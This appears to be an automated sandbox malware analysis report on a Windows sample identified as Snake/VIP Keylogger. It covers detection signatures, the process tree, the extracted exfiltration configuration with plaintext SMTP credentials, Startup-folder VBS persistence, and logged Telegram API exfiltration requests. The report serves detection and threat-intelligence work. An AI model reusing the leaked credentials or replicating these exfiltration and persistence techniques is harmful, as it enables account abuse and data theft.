Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ty1nyFUMlo.exe

Overview

General Information

Sample name:ty1nyFUMlo.exe
renamed because original name is a hash value
Original sample name:e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5.exe
Analysis ID:1588893
MD5:a3d99bcf752d0b63fa8d5515a4765777
SHA1:cea1bb29d2d34f8c46fa6c9c645cc9753d5a918e
SHA256:e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ty1nyFUMlo.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
    • enterogenous.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
      • RegSvcs.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7708 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • enterogenous.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\translucently\enterogenous.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
      • RegSvcs.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\translucently\enterogenous.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2cf3a:$a1: get_encryptedPassword
        • 0x2d257:$a2: get_encryptedUsername
        • 0x2cd4a:$a3: get_timePasswordChanged
        • 0x2ce53:$a4: get_passwordField
        • 0x2cf50:$a5: set_encryptedPassword
        • 0x2e60a:$a7: get_logins
        • 0x2e56d:$a10: KeyLoggerEventArgs
        • 0x2e1d2:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.enterogenous.exe.3b50000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.enterogenous.exe.3b50000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              6.2.enterogenous.exe.3b50000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                6.2.enterogenous.exe.3b50000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  6.2.enterogenous.exe.3b50000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2e13a:$a1: get_encryptedPassword
                  • 0x2e457:$a2: get_encryptedUsername
                  • 0x2df4a:$a3: get_timePasswordChanged
                  • 0x2e053:$a4: get_passwordField
                  • 0x2e150:$a5: set_encryptedPassword
                  • 0x2f80a:$a7: get_logins
                  • 0x2f76d:$a10: KeyLoggerEventArgs
                  • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 27 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , ProcessId: 7708, ProcessName: wscript.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 3.130.71.34, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49904
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" , ProcessId: 7708, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\translucently\enterogenous.exe, ProcessId: 7460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T06:49:12.512517+010028033053Unknown Traffic192.168.2.949776104.21.32.1443TCP
                  2025-01-11T06:49:13.763692+010028033053Unknown Traffic192.168.2.949788104.21.32.1443TCP
                  2025-01-11T06:49:15.017568+010028033053Unknown Traffic192.168.2.949796104.21.32.1443TCP
                  2025-01-11T06:49:17.567928+010028033053Unknown Traffic192.168.2.949815104.21.32.1443TCP
                  2025-01-11T06:49:18.840277+010028033053Unknown Traffic192.168.2.949826104.21.32.1443TCP
                  2025-01-11T06:49:20.233159+010028033053Unknown Traffic192.168.2.949839104.21.32.1443TCP
                  2025-01-11T06:49:21.526975+010028033053Unknown Traffic192.168.2.949847104.21.32.1443TCP
                  2025-01-11T06:49:28.196656+010028033053Unknown Traffic192.168.2.949893104.21.32.1443TCP
                  2025-01-11T06:49:33.261879+010028033053Unknown Traffic192.168.2.949933104.21.32.1443TCP
                  2025-01-11T06:49:34.531438+010028033053Unknown Traffic192.168.2.949943104.21.32.1443TCP
                  2025-01-11T06:49:37.046767+010028033053Unknown Traffic192.168.2.949963104.21.32.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T06:49:11.042226+010028032742Potentially Bad Traffic192.168.2.949764193.122.6.16880TCP
                  2025-01-11T06:49:11.948460+010028032742Potentially Bad Traffic192.168.2.949764193.122.6.16880TCP
                  2025-01-11T06:49:13.198467+010028032742Potentially Bad Traffic192.168.2.949782193.122.6.16880TCP
                  2025-01-11T06:49:26.761020+010028032742Potentially Bad Traffic192.168.2.949883193.122.6.16880TCP
                  2025-01-11T06:49:27.651622+010028032742Potentially Bad Traffic192.168.2.949883193.122.6.16880TCP
                  2025-01-11T06:49:28.932879+010028032742Potentially Bad Traffic192.168.2.949898193.122.6.16880TCP
                  2025-01-11T06:49:30.167266+010028032742Potentially Bad Traffic192.168.2.949906193.122.6.16880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T06:49:22.457221+010018100071Potentially Bad Traffic192.168.2.949853149.154.167.220443TCP
                  2025-01-11T06:49:37.930589+010018100071Potentially Bad Traffic192.168.2.949969149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: ty1nyFUMlo.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://mail.acadental.comAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeAvira: detection malicious, Label: HEUR/AGEN.1319493
                  Found malware configuration
                  Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeReversingLabs: Detection: 73%
                  Multi AV Scanner detection for submitted file
                  Source: ty1nyFUMlo.exeVirustotal: Detection: 61%Perma Link
                  Source: ty1nyFUMlo.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ty1nyFUMlo.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: ty1nyFUMlo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49770 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49888 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49969 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057DBBE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0054C2A2 FindFirstFileExW,0_2_0054C2A2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005868EE FindFirstFileW,FindClose,0_2_005868EE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0058698F
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D076
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D3A9
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00589642
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0058979D
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00589B2B
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00585C97
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00A9DBBE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A6C2A2 FindFirstFileExW,2_2_00A6C2A2
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA68EE FindFirstFileW,FindClose,2_2_00AA68EE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00AA698F
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D076
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D3A9
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA9642
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA979D
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00AA9B2B
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00AA5C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 030DF45Dh3_2_030DF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 030DF45Dh3_2_030DF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 030DFC19h3_2_030DF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0192F45Dh7_2_0192F2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0192F45Dh7_2_0192F4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0192FC19h7_2_0192F970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7E959h7_2_06C7E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C731E0h7_2_06C72DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C70D0Dh7_2_06C70B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C71697h7_2_06C70B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C72C19h7_2_06C72968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7E0A9h7_2_06C7DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7F209h7_2_06C7EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7CF49h7_2_06C7CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C731E0h7_2_06C72DC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7D7F9h7_2_06C7D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7E501h7_2_06C7E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7F661h7_2_06C7F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7EDB1h7_2_06C7EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7D3A1h7_2_06C7D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_06C70040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7FAB9h7_2_06C7F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C7DC51h7_2_06C7D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06C731E0h7_2_06C7310E

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49969 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49853 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.9:49904 -> 3.130.71.34:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49782 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49764 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49898 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49883 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49906 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49776 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49788 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 104.21.32.1:443
